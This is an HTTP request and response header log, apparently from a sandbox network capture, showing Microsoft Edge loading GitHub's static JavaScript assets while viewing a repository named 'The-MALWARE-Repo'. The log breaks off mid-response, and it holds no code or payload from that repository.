https://github.githubassets.com/assets/vendors-node_modules_emotion_is-prop-valid_dist_emotion-is-prop-valid_esm_js-node_modules_emo-62da9f-2df2f32ec596.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_emotion_is-prop-valid_dist_emotion-is-prop-valid_esm_js-node_modules_emo-62da9f-2df2f32ec596.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 05 Dec 2024 15:49:17 GMT
etag: "0x8DD1544602C817F"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 2468548
x-served-by: cache-iad-kjyo7100132-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 55, 15062
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: b0ef40bc5cf10631719d7649ac494b9ebd9fd2ac
content-length: 5120
GET

https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_stacktrace-parser_dist_s-e7dcdd-f7cc96ebae76.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_stacktrace-parser_dist_s-e7dcdd-f7cc96ebae76.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 07 Jan 2025 20:44:44 GMT
etag: "0x8DD2F5C1DF89D77"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 3669853
x-served-by: cache-iad-kiad7000074-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 43112, 15796
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: c968f594f6a8de3e42bbe967a906a01c45a699d5
content-length: 90082
GET

https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover-fn_js-55fea94174bf.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover-fn_js-55fea94174bf.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 12 Nov 2024 14:39:55 GMT
etag: "0x8DD0327E025E5FB"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 2478120
x-served-by: cache-iad-kcgs7200172-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 27, 15021
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 32e8b5bdf7c51dba08b5647876119ab332f055ac
content-length: 3077
GET

https://github.githubassets.com/assets/notifications-subscriptions-menu-58a0c58bfee4.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/notifications-subscriptions-menu-58a0c58bfee4.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 28 Feb 2025 16:44:21 GMT
etag: "0x8DD581726D218CC"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 505617
x-served-by: cache-iad-kiad7000063-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 27, 6077
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: ee57e1869a5c362dc4e45ebed829d17696518b1a
content-length: 5552
GET

https://github.githubassets.com/assets/ui_packages_ui-commands_ui-commands_ts-97496b0f52ba.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/ui_packages_ui-commands_ui-commands_ts-97496b0f52ba.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 27 Feb 2025 14:26:12 GMT
etag: "0x8DD573AAFCBC505"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 1040713
x-served-by: cache-iad-kjyo7100115-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 100, 15798
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 842a6f122f45cf7694a59ee891fcd48e17a81298
content-length: 6337
GET

https://github.githubassets.com/assets/keyboard-shortcuts-dialog-ac448fe050d6.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/keyboard-shortcuts-dialog-ac448fe050d6.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 19 Feb 2025 16:42:14 GMT
etag: "0x8DD51045DA82210"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 1693087
x-served-by: cache-iad-kcgs7200128-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 13, 16039
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 5e4a7751a6811111a1ef9440d99691cf1a2700e9
content-length: 6524
GET

https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-56e2d9924e94.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-56e2d9924e94.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Mon, 24 Feb 2025 18:43:37 GMT
etag: "0x8DD5503266F0C88"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 1296999
x-served-by: cache-iad-kjyo7100164-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 79, 13836
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 039bd5cbcea1bac7cdb7bf70f7aea3945272a1f4
content-length: 4156
GET

https://github.githubassets.com/assets/sessions-730dca81d0a2.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/sessions-730dca81d0a2.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 10 Dec 2024 19:56:20 GMT
etag: "0x8DD1954B7806BD4"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 1693631
x-served-by: cache-iad-kiad7000028-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 1, 8961
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 588588d76536ed03d769b23fee7e075317f4fb9b
content-length: 5942
GET

https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_es_mjs-dd1d3ea6a436.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_dompurify_dist_purify_es_mjs-dd1d3ea6a436.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 27 Feb 2025 14:26:15 GMT
etag: "0x8DD573AB1A5ED59"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 1040713
x-served-by: cache-iad-kjyo7100051-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 86, 11114
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: ecd8740b740c43af29376c4ee726d10ba7b687de
content-length: 3388
GET

https://github.githubassets.com/assets/vendors-node_modules_tanstack_query-core_build_modern_queryObserver_js-node_modules_tanstack_-defd52-843b41414e0e.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_tanstack_query-core_build_modern_queryObserver_js-node_modules_tanstack_-defd52-843b41414e0e.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 12 Nov 2024 14:39:55 GMT
etag: "0x8DD0327E029647C"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 1444996
x-served-by: cache-iad-kcgs7200065-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 33, 7718
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 736036c011aec4511487dfd50fb4f8b2be7e197f
content-length: 3412
GET

https://github.githubassets.com/assets/vendors-node_modules_github_hydro-analytics-client_dist_analytics-client_js-node_modules_gith-40531a-09af0ef9a562.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/vendors-node_modules_github_hydro-analytics-client_dist_analytics-client_js-node_modules_gith-40531a-09af0ef9a562.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 11 Mar 2025 18:04:30 GMT
etag: "0x8DD60C72B716393"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 15660
x-served-by: cache-iad-kcgs7200116-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 40, 366
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: fe239efd24be7d19a2b1a6894fd124d9ef618a30
content-length: 7117
GET

https://github.githubassets.com/assets/ui_packages_aria-live_aria-live_ts-ui_packages_promise-with-resolvers-polyfill_promise-with-r-17c672-34345cb18aac.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/ui_packages_aria-live_aria-live_ts-ui_packages_promise-with-resolvers-polyfill_promise-with-r-17c672-34345cb18aac.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 19 Feb 2025 17:02:34 GMT
etag: "0x8DD510734B3091A"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 1261030
x-served-by: cache-iad-kjyo7100158-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 569, 8872
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: d0caf191173d15a591af0d014194f7b7e579c448
content-length: 6468
GET

https://github.githubassets.com/assets/ui_packages_paths_index_ts-5e577baa9efd.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/ui_packages_paths_index_ts-5e577baa9efd.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 18 Feb 2025 12:21:19 GMT
etag: "0x8DD5016BFEDEAE3"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 1068359
x-served-by: cache-iad-kcgs7200153-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 24, 11319
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 454499a9cf13b59946a25cf620d8629f5ec33cff
content-length: 8171
GET

https://github.githubassets.com/assets/ui_packages_ref-selector_RefSelector_tsx-7496afc3784d.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/ui_packages_ref-selector_RefSelector_tsx-7496afc3784d.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 20 Feb 2025 22:50:49 GMT
etag: "0x8DD52010547BC29"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 1584882
x-served-by: cache-iad-kiad7000091-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 59, 13608
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 7e4918810a725b48ca38a5e4826a406103c9ba7b
content-length: 5322
GET

https://github.githubassets.com/assets/ui_packages_commit-attribution_index_ts-ui_packages_commit-checks-status_index_ts-ui_packages-762eaa-c6c7f3dd0990.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/ui_packages_commit-attribution_index_ts-ui_packages_commit-checks-status_index_ts-ui_packages-762eaa-c6c7f3dd0990.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Tue, 04 Mar 2025 16:34:00 GMT
etag: "0x8DD5B3A5E329F61"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 635086
x-served-by: cache-iad-kjyo7100155-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 75, 6095
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: eada2ef7307e038e17f2682b3059b8d47a4bc6d4
content-length: 7939
GET

https://github.githubassets.com/assets/ui_packages_code-view-shared_hooks_use-file-page-payload_ts-ui_packages_hydro-analytics_hydro-fedf97-6005b51c40ca.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/ui_packages_code-view-shared_hooks_use-file-page-payload_ts-ui_packages_hydro-analytics_hydro-fedf97-6005b51c40ca.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Fri, 07 Mar 2025 14:57:14 GMT
etag: "0x8DD5D885922D1E6"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 375301
x-served-by: cache-iad-kiad7000037-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 23, 3781
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: e781b7135b4dc344c176591ad88db81b7be8d09c
content-length: 14618
GET

https://github.githubassets.com/assets/repos-overview-4716c48fca22.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/repos-overview-4716c48fca22.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Sat, 08 Mar 2025 02:49:02 GMT
etag: "0x8DD5DEBC90F1819"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:04 GMT
age: 261137
x-served-by: cache-iad-kiad7000124-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 61, 2589
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 1834c54a7e7e88a1c0d022fae616911d35f1c9b1
content-length: 22601
GET

https://github.githubassets.com/assets/chunk-app_components_primer_experimental_select-panel-element_ts-dbc875e76b97.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/chunk-app_components_primer_experimental_select-panel-element_ts-dbc875e76b97.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Thu, 13 Feb 2025 15:14:49 GMT
etag: "0x8DD4C4128E82E39"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:05 GMT
age: 2199444
x-served-by: cache-iad-kjyo7100044-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 36, 14964
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 4885e2a31f79697a8db9bf21ece850aa0bfe2ce3
content-length: 7780
GET

https://github.githubassets.com/assets/chunk-app_components_primer_experimental_toggle-switch-element_ts-670c71d392c6.js

msedge.exe

Remote address:

185.199.108.154:443

Request

GET /assets/chunk-app_components_primer_experimental_toggle-switch-element_ts-670c71d392c6.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Da2dalus/The-MALWARE-Repo
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

cache-control: public, max-age=31536000, immutable
content-type: application/javascript
last-modified: Wed, 12 Feb 2025 21:20:51 GMT
etag: "0x8DD4BAB206F2F47"
server: Windows-Azure-Web/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Wed, 12 Mar 2025 02:35:05 GMT
age: 2199443
x-served-by: cache-iad-kjyo7100175-IAD, cache-lon420133-LON
x-cache: HIT, HIT
x-cache-hits: 36, 14802
